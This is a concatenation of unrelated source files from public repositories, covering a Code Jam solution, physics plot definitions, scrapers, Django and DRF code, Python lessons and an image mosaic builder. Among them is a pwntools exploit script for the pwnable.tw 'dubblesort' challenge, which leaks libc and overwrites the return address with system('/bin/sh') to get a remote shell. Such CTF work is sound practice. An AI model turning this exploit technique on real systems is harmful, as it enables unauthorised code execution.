UTF-8
|
Python
| false
| false
| 838
|
py
|
# input() reads a string with a line of input, stripping the '\n' (newline) at the end.
# This is all you need for most Google Code Jam problems.
t = int(input()) # read a line with a single integer
for i in range(1, t + 1):
number = [int(s) for s in input()]
adjust = 0
final = 0
same = 0
output = ""
for j in range(0, len(number)-1):
if number[j] > number[j+1]:
adjust = len(number)- 1 - j + same
break
elif number[j] == number[j+1]:
same += 1
for integer in number:
output += str(integer)
if (adjust > 0):
adjustment = "1"
for k in range(adjust):
adjustment += "0"
final = int(output) - int(output) % int(adjustment) - 1
output = final
print("Case #{}: {}".format(i, int(output)))
# check out .format's specification for more formatting options
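# Worked example for this solution (inputs assumed from the well-known "Tidy Numbers"
# statement, not part of this submission): an input line of 132 prints 129, and 1000
# prints 999, since 132 - 132 % 10 - 1 = 129 and 1000 - 1000 % 1000 - 1 = 999.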
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
4a9d85d73d161d461258a8b08813d81d310c6bba
|
242d50e9daeee73653e0e553679a61f3e984a303
|
/plots/python/cutsJet1.py
|
7f0eb9af5ec549ee7193ac746e4f49528a5ca1c9
|
[] |
no_license
|
HephyAnalysisSW/TTGammaEFT
|
72cf63d20097daa37ffd008904d75a78fa009162
|
bbedb106154bab510289a3833ec39949c5e4b005
|
refs/heads/master
| 2021-11-28T09:44:56.093647
| 2021-10-22T08:45:14
| 2021-10-22T08:45:14
| 157,550,390
| 0
| 2
| null | 2020-07-02T06:29:45
| 2018-11-14T13:08:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,096
|
py
|
#!/usr/bin/env python
''' Define list of plots for plot script
'''
# Standard Imports
from math import pi
# RootTools
from RootTools.core.standard import *
# plotList
cutsJet1 = []
cutsJet1.append( Plot(
name = 'jet1_neHEF',
texX = 'neHEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_neHEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_neEmEF',
texX = 'neEmEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_neEmEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_chEmHEF',
texX = 'chEmEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_chEmEF[1],
binning = [ 30, 0., 1 ],
))
cutsJet1.append( Plot(
name = 'jet1_chHEF',
texX = 'chHEF(jet_{1})',
texY = 'Number of Events',
attribute = lambda event, sample: event.Jet_chHEF[1],
binning = [ 30, 0, 1 ],
))
|
[
"lukas.k.lechner@gmail.com"
] |
lukas.k.lechner@gmail.com
|
be67f68208b753fa387e260cf954c5e941ff7844
|
f4d0f1357530a5889fcbf51bb9b9c5abe86afe9d
|
/scrapy.py
|
d9f70ec729a40a626b82037faba5e91e5bc228b9
|
[] |
no_license
|
marcelosantos/python-web-scraping
|
fd25e7372dbb1ad77aa537e6111eba99c9d363cb
|
0c7c6c837903de1a1910280661635daf8579d1bf
|
refs/heads/master
| 2021-01-01T18:28:37.730372
| 2017-01-06T19:30:44
| 2017-01-06T19:30:44
| 78,232,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 586
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'http://www.blog.pythonlibrary.org/'
def get_articles():
""" Get the articles from the front page of the blog """
req = requests.get(url)
html = req.text
soup = BeautifulSoup(html, 'html.parser')
pages = soup.findAll('h1')
articles = {i.a['href']: i.text.strip()
for i in pages if i.a}
for article in articles:
s = '{title}: {url}'.format(title=articles[article], url=article)
print(s)
return articles
if __name__ == '__main__':
articles = get_articles()
|
[
"marcelosantosadm@gmail.com"
] |
marcelosantosadm@gmail.com
|
02ff9203e38764ba63dffd72edcc3d9bcc88c667
|
83de24182a7af33c43ee340b57755e73275149ae
|
/aliyun-python-sdk-ecd/aliyunsdkecd/request/v20200930/ApproveFotaUpdateRequest.py
|
9aa68198a829fe25048d4a1eeb00483f8e626999
|
[
"Apache-2.0"
] |
permissive
|
aliyun/aliyun-openapi-python-sdk
|
4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f
|
83fd547946fd6772cf26f338d9653f4316c81d3c
|
refs/heads/master
| 2023-08-04T12:32:57.028821
| 2023-08-04T06:00:29
| 2023-08-04T06:00:29
| 39,558,861
| 1,080
| 721
|
NOASSERTION
| 2023-09-14T08:51:06
| 2015-07-23T09:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecd.endpoint import endpoint_data
class ApproveFotaUpdateRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'ecd', '2020-09-30', 'ApproveFotaUpdate')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_AppVersion(self): # String
return self.get_query_params().get('AppVersion')
def set_AppVersion(self, AppVersion): # String
self.add_query_param('AppVersion', AppVersion)
def get_DesktopId(self): # String
return self.get_query_params().get('DesktopId')
def set_DesktopId(self, DesktopId): # String
self.add_query_param('DesktopId', DesktopId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
d77de184040e7ebe354e10ffa5520ea641e93455
|
a6cefd249baa7d7de56c435dbd023339d32b1127
|
/loadmat.py
|
f8e679d2d22dbaac2bdaf945aa7ace060f7a45c7
|
[] |
no_license
|
jmbruges/semSync
|
9ffa8124c5d3b50e3ca4058abe72e748cc591f55
|
88d6791a689796751eccfb249719be70a75fe14f
|
refs/heads/master
| 2020-06-20T01:41:48.486260
| 2019-07-15T07:36:44
| 2019-07-15T07:36:44
| 196,947,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,184
|
py
|
# loadmat.py
import scipy as sp
import scipy.io as spio # this is to import Matlab files, e.g. structure type
def loadmat(filename):
'''
this function should be called instead of direct spio.loadmat
as it cures the problem of not properly recovering python dictionaries
from mat files. It calls the function check keys to cure all entries
which are still mat-objects
'''
data = spio.loadmat(filename, struct_as_record=False, squeeze_me=True)
return _check_keys(data)
def _check_keys(dict):
'''
checks if entries in dictionary are mat-objects. If yes
todict is called to change them to nested dictionaries
'''
for key in dict:
if isinstance(dict[key], spio.matlab.mio5_params.mat_struct):
dict[key] = _todict(dict[key])
return dict
def _todict(matobj):
'''
A recursive function which constructs from matobjects nested dictionaries
'''
dict = {}
for strg in matobj._fieldnames:
elem = matobj.__dict__[strg]
if isinstance(elem, spio.matlab.mio5_params.mat_struct):
dict[strg] = _todict(elem)
else:
dict[strg] = elem
return dict
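if __name__ == "__main__":
    # Minimal usage sketch; 'example.mat' is an illustrative filename assumed here,
    # not a file that ships with this module.
    import os
    if os.path.exists('example.mat'):
        data = loadmat('example.mat')
        print(list(data.keys()))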
|
[
"javbru@pop-os.localdomain"
] |
javbru@pop-os.localdomain
|
bc8493def8d4bd248adf21fd2e2afe1310914713
|
a140fe192fd643ce556fa34bf2f84ddbdb97f091
|
/.history/사용자정의예외처리_20200709155926.py
|
50dfdf7745a95aa031e58bbcf32a3cb61abeb416
|
[] |
no_license
|
sangha0719/py-practice
|
826f13cb422ef43992a69f822b9f04c2cb6d4815
|
6d71ce64bf91cc3bccee81378577d84ba9d9c121
|
refs/heads/master
| 2023-03-13T04:40:55.883279
| 2021-02-25T12:02:04
| 2021-02-25T12:02:04
| 342,230,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
class BigNumberError(Exception):
    def __init__(self, msg):
        self.msg = msg
try:
    print("This calculator is for dividing one-digit numbers only.")
    num1 = int(input("Enter the first number : "))
    num2 = int(input("Enter the second number : "))
    if num1 >= 10 or num2 >= 10:
        raise BigNumberError("only one-digit numbers are allowed")
    print("{0} / {1} = {2}".format(num1, num2, int(num1 / num2)))
except ValueError:
    print("You entered an invalid value. Please enter one-digit numbers only.")
except BigNumberError:
    print("An error occurred. Please enter one-digit numbers only.")
|
[
"sangha0719@gmail.com"
] |
sangha0719@gmail.com
|
1e96e7cc7e1f51834877e17634f948ebee8dc31f
|
ac75b787a84d15e15a3339cc1e72280015f9829f
|
/pyrosim_env/bin/easy_install-2.7
|
60b7a9605667c9c2e8edc2e6ec49206f1af720f9
|
[] |
no_license
|
mmarder96/pyrosim
|
e5cb1ec2c7eb07c5a4c841d4e46cece5cff3ed1e
|
c9879462d58806f5473e55762290a31825bbe6ce
|
refs/heads/master
| 2020-03-31T14:58:11.405260
| 2018-06-24T22:22:06
| 2018-06-24T22:22:06
| 152,317,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
7
|
#!/home/max/dev/pyrosim/pyrosim_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"demenon290@gmail.com"
] |
demenon290@gmail.com
|
2a413c3593c9375a9624c588d6d41eb2f1c38247
|
7c88abfec665c7e73c672480cfcdbbe374c9ca01
|
/covidportal/beds/forms.py
|
c0315e8607533a14cdd55174051b99f3966f46a4
|
[] |
no_license
|
biya-sussan-varghese/django-app
|
8c75c26baa1f8364291ab547723dc43532ede063
|
9c15f5e6b346d6224fbfca050b634184a71ef363
|
refs/heads/master
| 2023-05-02T05:43:09.982222
| 2021-05-20T17:54:14
| 2021-05-20T17:54:14
| 369,268,105
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
from django.forms import ModelForm
from .models import Patient,BedAllocation
class PatientForm(ModelForm):
    class Meta:
        model = Patient
        fields = ['name', 'age','location', 'district', 'phone', 'aadhar', 'category']
class BedAllocationForm(ModelForm):
    class Meta:
        model = BedAllocation
        fields = ['patient', 'category']
    def __init__(self, hospital=None, **kwargs):
        super(BedAllocationForm, self).__init__(**kwargs)
        self.fields['patient'].queryset = Patient.objects.filter(district=hospital.district, status='W')
|
[
"christy219008@sahrdaya.ac.in"
] |
christy219008@sahrdaya.ac.in
|
31c89ed6485f9df323dbb57e8f982d10e5b85f9e
|
79ed6b86bfbc9d6c97e612662d57fc31007ab85f
|
/sandbox/officeAnalysis.py
|
d426210ba709d11bbde978b24c03b171ab5a0898
|
[] |
no_license
|
saniemi/SamPy
|
d4b97581cbee534ddfb077aeaec4c46eacdf3e15
|
5da864558774c4fefddbe0663db68aea26f0f7a8
|
refs/heads/master
| 2021-01-19T03:18:21.598686
| 2016-08-05T08:26:06
| 2016-08-05T08:26:06
| 55,225,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,576
|
py
|
"""
Survey Analysis
===============
A simple script to do some analysis on survey data.
Dependencies
------------
:requires: pandas
:requires: numpy
:requires: matplotlib
:requires: nltk
:requires: wordcloud
:requires: rpy2
Author
------
:author: Sami Niemi (sami.niemi@valtech.co.uk)
Version
-------
:version: 0.1
:date: 24-Mar-2016
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import rpy2.robjects as robjects
import string
import itertools
from collections import Counter
from wordcloud import WordCloud, STOPWORDS
from nltk.corpus import stopwords
#import re
#import nltk
#from nltk.tokenize import TreebankWordTokenizer
#from nltk import word_tokenize
#from nltk.stem.snowball import SnowballStemmer
#from textblob import TextBlob
class WordCloudSMN(WordCloud):
"""
Add a new method to the wordcloud class to bypass tokenizing.
"""
def generate_SMN(self, wordlist):
words = dict(Counter(wordlist).most_common()).items()
self.generate_from_frequencies(words)
return self
def _saveRdata2csv(filename="/Users/saminiemi/Projects/OfficeSurvey/Mikayel/surveymonkey.RData",
outfolder="/Users/saminiemi/Projects/OfficeSurvey/data/"):
"""
Simple function to convert RData file to csv file(s).
:param filename: name of the RData file
:param outfolder: location of the output
:return: None
"""
data = robjects.r['load'](filename)
for x in data:
tmp = robjects.r[x]
try:
print(x)
tmp.to_csvfile(outfolder + str(x) + '.csv')
except:
pass
def loadData(filename, folder="/Users/saminiemi/Projects/OfficeSurvey/data/"):
"""
Load data from a csv file.
:param filename: name of the csv file to load
:param folder: location of the data
:return: data frame
"""
df = pd.read_csv(folder+filename)
return df
def getWords(df, column='Response.Text', verbose=True):
"""
Collect the words from a pandas data frame / series.
Perform tokenizing and various manipulations.
:param df: input data frame / series
:param column: name of the column to stores the information
:param verbose: whether or not to output some extra information
:return: words
:rtype: list
"""
# get data and convert the series to a single string by replacing ; and & with ,
# responses = df[column]
# responses = ', '.join(e.lower().strip().replace(';', ',').replace('&', ',').replace('.', ',') for e in responses.tolist())
# print(responses)
#
#
# # tokenize to words
# words = responses.split(',')
# #words = word_tokenize(responses)
# #words = nltk.tokenize.wordpunct_tokenize(responses)
# #tokenizer = nltk.tokenize.mwe.MWETokenizer()
# #words = tokenizer(responses)
responses = df[column]
words = []
for response in responses:
response = response.strip().replace('.', ',').replace('&', ',').replace(';', ',').replace('!', '').lower()
# split based on commas
tmp = response.split(',')
# if length < 2, no commas, then split on "and"
if len(tmp) < 2:
tmp = response.split('and')
# remove extra spaces
tmp = [i.strip() for i in tmp]
# remove if length less than 2
tmp = [i for i in tmp if len(i) > 2]
# split based on and and :
#tmp = [i.split(';') for i in tmp]
#tmp = list(itertools.chain(*tmp))
#tmp = [i.split('and') for i in tmp]
#tmp = list(itertools.chain(*tmp))
# if length less than 2 then split using space
#if len(tmp) < 2:
# tmp = response.split(' ')
words.append(tmp)
# convert nested lists to a single list
words = list(itertools.chain(*words))
# remove punctuation
punctuations = list(string.punctuation)
words = [i.lower() for i in words if i not in punctuations]
# remove stop words
stop = stopwords.words('english')
    stop.extend(['looking', 'looks', 'office', 'and', 'some', 'for', 'are'])  # extend, not append, so each word is added individually
words = [i.strip() for i in words if i not in stop]
# remove prefixes and numerals
words = [i.replace(' a ', ' ').strip() for i in words]
words = [i.replace(' an ', '').strip() for i in words]
words = [i.replace(' the ', '').strip() for i in words]
words = [i.replace(' one ', '').strip() for i in words]
words = [i.replace(' two ', '').strip() for i in words]
words = [i.replace(' it ', '').strip() for i in words]
#words = [i.replace(' for ', '').strip() for i in words]
words = [i.replace('plenty of', '').strip() for i in words]
words = [i.replace('like ', '').strip() for i in words]
# brackets
words = [i.replace('(', '').strip() for i in words]
words = [i.replace(')', '').strip() for i in words]
# remove adjectives and please
words = [i.replace('good ', '').strip() for i in words]
words = [i.replace('decent ', '').strip() for i in words]
words = [i.replace('nice ', '').strip() for i in words]
words = [i.replace('big ', '').strip() for i in words]
words = [i.replace('very ', '').strip() for i in words]
words = [i.replace('please', '').strip() for i in words]
# remove acronyms and extras
words = [i.replace('def ', '').strip() for i in words]
words = [i.replace('some ', '').strip() for i in words]
# convert too few to lack of
words = [i.replace('too few ', 'lack of ') for i in words]
words = [i.replace('no ', 'lack of ') for i in words]
words = [i.replace('a lot of ', '') for i in words]
words = [i.replace('too much ', '') for i in words]
# convert comfortable to comfy - these are the same
words = [i.replace('comfortable', 'comfy') for i in words]
words = [i.replace('bicycle', 'bike') for i in words]
# change coffee to coffee machine
words = [i.replace('machine', '').strip() for i in words]
words = [i.replace('coffee', 'coffee machine').strip() for i in words]
# change shower to showers
words = [i.replace('showers', 'shower') for i in words]
words = [i.replace('shower', 'showers') for i in words]
# change wordings
words = [i.replace('lighting', 'lights') for i in words]
# remove if length less than 2
words = [i for i in words if len(i) > 2]
#stemming
#stemmer = SnowballStemmer('english')
#for i, word in enumerate(words):
# words[i] = stemmer.stem(word)
if verbose:
print(words)
return words
def generateStatistics(words, outfile, title, mostcommon=12, verbose=True):
"""
:param words: words in a list
:param outfile: name of the output file
:param title: title of the figure
:param mostcommon: how many of the most common to output
:return: None
"""
word_counts = Counter(words)
# save to a file
with open(outfile.replace('.pdf', '.csv'), 'w') as f:
for k,v in word_counts.most_common():
f.write("{},{}\n".format(k, v))
if verbose:
print("Most common words:")
for item in word_counts.most_common(mostcommon):
print(item)
wc = word_counts.most_common(mostcommon)
words = []
counts = []
for w, c in wc:
words.append(w)
counts.append(c)
y_pos = np.arange(len(words))
# plot statistics
plt.figure(figsize=(12, 12))
plt.subplots_adjust(left=0.3)
plt.barh(y_pos[::-1], counts, align='center', alpha=0.4)
plt.yticks(y_pos[::-1], words)
plt.ylim(y_pos[0] - 1, y_pos[-1] + 1)
plt.xlabel('Number of Times')
plt.title(title)
plt.savefig(outfile)
plt.close()
def generateWordcloud(wordlist, outfile, title, nwords=100):
"""
:param wordlist: words in a list
:param outfile: name of the output file to which to store the figure
:param title: title of the figure
:param nwords: maximum number of words to plot
:return: None
"""
# generate word cloud
wc = WordCloudSMN(background_color="white", max_words=nwords,
width=800, height=400,
                      stopwords=STOPWORDS | {"looking"},  # set union; .add() would return None
max_font_size=80, random_state=42)
wc.generate_SMN(wordlist)
# generate the figure
plt.figure(figsize=(16, 16))
plt.title(title)
plt.imshow(wc)
plt.axis("off")
plt.savefig(outfile)
plt.close()
def processTextFile(filename='q1.csv', title='Q1'):
"""
:param filename: name of the data file
:param title: title for the figures
:return: None
"""
data = loadData(filename=filename)
words = getWords(data)
generateWordcloud(words, filename.replace('.csv', 'Wordcloud.pdf'), title)
generateStatistics(words, filename.replace('.csv', 'Histogram.pdf'), title)
def processNumericFileQ6(filename='q6.csv', title='Q6'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
data = loadData(filename=filename)
data['sum'] = data['One'] + data['Two'] + data['Three'] + data['Four'] + data['Five']
#data.sort(columns=['One', 'Two', 'Three', 'Four', 'Five'], ascending=False, inplace=True)
data.sort_values(by=['sum', 'One'], ascending=False, inplace=True)
print(data)
x_pos = np.arange(len(data['Answer.Options'].values))
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.5)
p1 = ax.bar(x_pos, data['One'], align='center',
alpha=0.4, color='m')
p2 = ax.bar(x_pos, data['Two'], bottom=data['One'],
align='center', alpha=0.4, color='b')
p3 = ax.bar(x_pos, data['Three'], bottom=(data['One'] + data['Two']), align='center',
alpha=0.4, color='r')
p4 = ax.bar(x_pos, data['Four'], bottom=(data['One'] + data['Two'] + data['Three']),
align='center', alpha=0.4, color='green')
p5 = ax.bar(x_pos, data['Five'], bottom=(data['One'] + data['Two'] + data['Three'] + data['Four']),
align='center', alpha=0.4, color='yellow')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
plt.legend((p1[0], p2[0], p3[0], p4[0], p5[0]), ('One', 'Two', 'Three', 'Four', 'Five'))
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
def processNumericFileQ7(filename='q7.csv', title='Q7'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
data = loadData(filename=filename)
data['sum'] = data['One'] + data['Two'] + data['Three'] + data['Four']
data.sort_values(by=['sum', 'One'], ascending=False, inplace=True)
print(data)
x_pos = np.arange(len(data['Answer.Options'].values))
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.4)
p1 = ax.bar(x_pos, data['One'], align='center',
alpha=0.4, color='m')
p2 = ax.bar(x_pos, data['Two'], bottom=data['One'],
align='center', alpha=0.4, color='b')
p3 = ax.bar(x_pos, data['Three'], bottom=(data['One'] + data['Two']), align='center',
alpha=0.4, color='r')
p4 = ax.bar(x_pos, data['Four'], bottom=(data['One'] + data['Two'] + data['Three']),
align='center', alpha=0.4, color='green')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
plt.legend((p1[0], p2[0], p3[0], p4[0]), ('One', 'Two', 'Three', 'Four'))
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
def processNumericFileQ8(filename='q8.csv', otherfile='q8_other.csv', title='Q8'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
# response data
data = loadData(filename=filename)
data.sort_values(by=['Response.Count'], ascending=False, inplace=True)
# other answers
otherdata = loadData(filename=otherfile)
others = otherdata['If.other..please.specify.'].values
x_pos = np.arange(len(data['Answer.Options'].values))
# generate figure
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.35)
ax.bar(x_pos, data['Response.Count'], align='center', alpha=0.4, color='m')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
for i, text in enumerate(others):
ax.annotate('Other: ' + text, xy=(20, (10 + 15*i)), xycoords='figure points')
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
if __name__ == "__main__":
_saveRdata2csv()
processTextFile(filename='q1.csv', title='Q1 - How would you describe the office we should be designing?')
processTextFile(filename='q2.csv', title='Q2 - Please give elements that would make you happy about coming into the office')
processTextFile(filename='q3.csv', title='Q3 - Please give elements that would help you produce your best work at the office')
processTextFile(filename='q4.csv', title='Q4 - Please list anything that may hinder your productivity')
processNumericFileQ6()
processNumericFileQ7()
processNumericFileQ8()
|
[
"Sami.Niemi@valtech.co.uk"
] |
Sami.Niemi@valtech.co.uk
|
d947cbfeb799505d1e5542d28c3c4e07143a3117
|
db43e14fb860d20981d7444104ade55bf80ecc57
|
/horse_app/serializer.py
|
fd43d2e49d4687e8d44f6da4cdfbd136f079d5cc
|
[] |
no_license
|
B2Gdevs/horse-market
|
4ee0cb38260e07da2fe9b8aac1cee9df9a27a3f2
|
615da451f3b995a2059c7b4c40e52f951b45394a
|
refs/heads/main
| 2023-05-15T17:59:54.405452
| 2021-05-27T00:01:16
| 2021-05-27T00:01:16
| 368,019,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
from rest_framework import serializers
from auth_app.serializer import UserSerializer
from horse_app.models import Horse, SliderImage, Message
class HorseViewSerializer(serializers.ModelSerializer):
owner = UserSerializer(many=False)
url = serializers.HyperlinkedIdentityField('horse-detail')
class Meta:
model = Horse
fields = '__all__'
class HorseCreateSerializer(serializers.ModelSerializer):
class Meta:
model = Horse
fields = '__all__'
read_only_fields = ['owner']
class SliderSerializer(serializers.ModelSerializer):
image = serializers.ImageField(use_url=True)
class Meta:
model = SliderImage
fields = ['id', 'image']
read_only_fields = ['id']
class HorseSearchSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('horse-detail')
class Meta:
model = Horse
fields = ['id', 'title', 'image', 'description', 'price', 'address', 'url']
class StripeSerializer(serializers.Serializer):
email = serializers.EmailField(allow_null=False, allow_blank=False)
payment_method_id = serializers.CharField(max_length=200, allow_blank=False, allow_null=False)
product_id = serializers.IntegerField()
class MessageSerializer(serializers.ModelSerializer):
class Meta:
model = Message
fields = '__all__'
read_only_fields = ['horse']
|
[
"b2gdevs@gmail.com"
] |
b2gdevs@gmail.com
|
8932bac6b9449a31176dcb2c912a072e42621129
|
be3f21ff09ca547b4551b3e30c2cd16b32953332
|
/pwnabletw/dubblesort/solve.py
|
57ab24fb8c9ec9487fedec46ae94b42d1f838fa9
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
nithinchowdary007/writeups
|
42369017213a15f53827a942ca45334444364fad
|
6dedce2f01bf653258a2b43c85e086eba8288462
|
refs/heads/master
| 2023-04-14T18:06:13.971831
| 2021-04-09T13:44:46
| 2021-04-09T13:44:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,324
|
py
|
from pwn import *
e = ELF("./dubblesort")
libc = ELF("./libc_32.so.6")
ld = ELF("./ld-2.23.so")
context.binary = e
context.terminal = ["konsole", "-e"]
while True:
# just keep running this POS until u get shell
#p = process([ld.path, e.path], env={"LD_PRELOAD": libc.path})
p = remote("chall.pwnable.tw", "10101")
context.log_level="debug"
#0xf7fd0b13
gdb.attach(p, """break * 0xf7fd0afe
break * 0xf7fd0ab3
c
x/12wx $esp+0x7c
""")
p.recvuntil(":")
p.sendline("\x69"*4 + "A"*16 + "B"*4)
p.recvuntil("\n")
data = "\x00" + p.recv(3)
print(data)
libc.address = u32(data) - 0x1b0000
binsh = next(libc.search("/bin/sh"))
print("libc base", hex(libc.address))
print("libc system", hex(libc.sym["system"]))
print("libc binsh string", hex(binsh))
p.recvuntil(":")
p.sendline("51")
for i in range(10):
p.recvuntil(":")
p.sendline("0")
for i in range(4):
p.recvuntil(":")
p.sendline(str(0xffff0000))
p.recvuntil(":")
p.sendline(str(libc.sym["system"]))
p.recvuntil(":")
p.sendline(str(binsh))
p.recvuntil(":")
p.sendline(str(binsh))
p.recvuntil(":")
p.sendline("A")
p.interactive()
p.close()
|
[
"jwanggt@gmail.com"
] |
jwanggt@gmail.com
|
938eb9df3b8a2db62a40ce15b101f61e6db3da32
|
fda3e6f885f046e5f705cb0aab6dac04c0063e74
|
/scripts/ya-bedev-06-01-00.py
|
1ee63b9b8081c25c826ac218c36cc37b96a2d29c
|
[] |
no_license
|
odvk/ynd-bedev-crs
|
9bbd51ddacc0f0693f76a5d4b076647e744e5950
|
e657b2b9b0b64a82ba815d4acfbb033244d11ae7
|
refs/heads/master
| 2020-07-03T08:50:25.490653
| 2019-08-15T06:14:24
| 2019-08-15T06:14:24
| 201,857,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,556
|
py
|
# 1. What are libraries?
# A library, or module, is a set of ready-made functions grouped around a common theme. For example, the math library collects functions for computing mathematical values.
"""
To get access to these functions, you import the library with the import command at the start of the program. This is also called "connecting a module". For math you write import math. Here is a call to the square-root function sqrt() from that library:
"""
import math # now every function from the math module can be used in the program
print(math.sqrt(16))
# 4.0
"""
The randint() function from the random module, which you already know, picks a random integer in a given range. There are others too, for example:
random.choice(list) returns a random element from the list
random.random() returns a random float from 0.0 up to, but not including, 1.0
If you do not need every function in a library, you can import only the ones you need with the construct from random import choice (from the random library, import the choice function).
Here is code for picking a present for a child. After importing choice explicitly, it can be used directly, without mentioning the library name.
"""
from random import choice
def find_a_present(prizes):
    return choice(prizes) # we write choice(), not random.choice()
print(find_a_present(['doll', 'chewing gum', 'toy python']))
print(find_a_present(['ball', 'cheburashka', 'losyash']))
# When importing a library you can give it a new name, for example if you do not want to type the full name on every call:
import random as r
print(r.randint(0, 100)) # a random integer from 0 to 99
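# A short extra sketch (not part of the original lesson) showing the other random
# functions described above; the prize list is a made-up example.
import random
prizes = ['doll', 'ball', 'toy python']
print(random.choice(prizes))  # a random element from the list
print(random.random())        # a random float from 0.0 up to, but not including, 1.0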
|
[
"kustov.dv@gmail.com"
] |
kustov.dv@gmail.com
|
f095803d34ccf540ecc117845e2a8679494cef17
|
15f6b817e8fdf0b2fab07149d53a42ad9b20e61b
|
/cod/add_pieces_mosaic.py
|
0e16c85c9025925041772a26f297b16980ab02ac
|
[] |
no_license
|
PredaAlinCatalin/Mosaic-image
|
70fdb0abd702a95769ef8ca9eb75e7e79cb93b5e
|
76cf21d7429ce03c39c5ef345a116805ed7ad553
|
refs/heads/main
| 2023-03-12T00:00:29.789112
| 2021-03-02T19:47:13
| 2021-03-02T19:47:13
| 343,893,378
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,447
|
py
|
from parameters import *
import numpy as np
import pdb
import timeit
import math
def add_pieces_grid(params: Parameters):
start_time = timeit.default_timer()
img_mosaic = np.zeros(params.image_resized.shape, np.uint8)
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
small_images_indexes = np.zeros((params.num_pieces_vertical, params.num_pieces_horizontal))
if params.criterion == 'aleator':
for i in range(params.num_pieces_vertical):
for j in range(params.num_pieces_horizontal):
index = np.random.randint(low=0, high=N, size=1)
img_mosaic[i * H: (i + 1) * H, j * W: (j + 1) * W, :] = params.small_images[index]
print('Building mosaic %.2f%%' % (100 * (i * params.num_pieces_horizontal + j + 1) / num_pieces))
elif params.criterion == 'distantaCuloareMedie':
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
for i in range(params.num_pieces_vertical):
for j in range(params.num_pieces_horizontal):
patch = params.image_resized[i * H: (i + 1) * H, j * W: (j + 1) * W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if i > 0:
if small_images_indexes[i - 1, j] == ii:
continue
if j > 0:
if small_images_indexes[i, j - 1] == ii:
continue
break
index = ii
img_mosaic[i * H: (i + 1) * H, j * W: (j + 1) * W] = params.small_images[index]
small_images_indexes[i, j] = index
else:
print('Error! unknown option %s' % params.criterion)
exit(-1)
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
def get_sorted_indices(mean_color_pieces, mean_patch):
distances = np.sum((mean_color_pieces - mean_patch) ** 2, axis=1)
return distances.argsort()
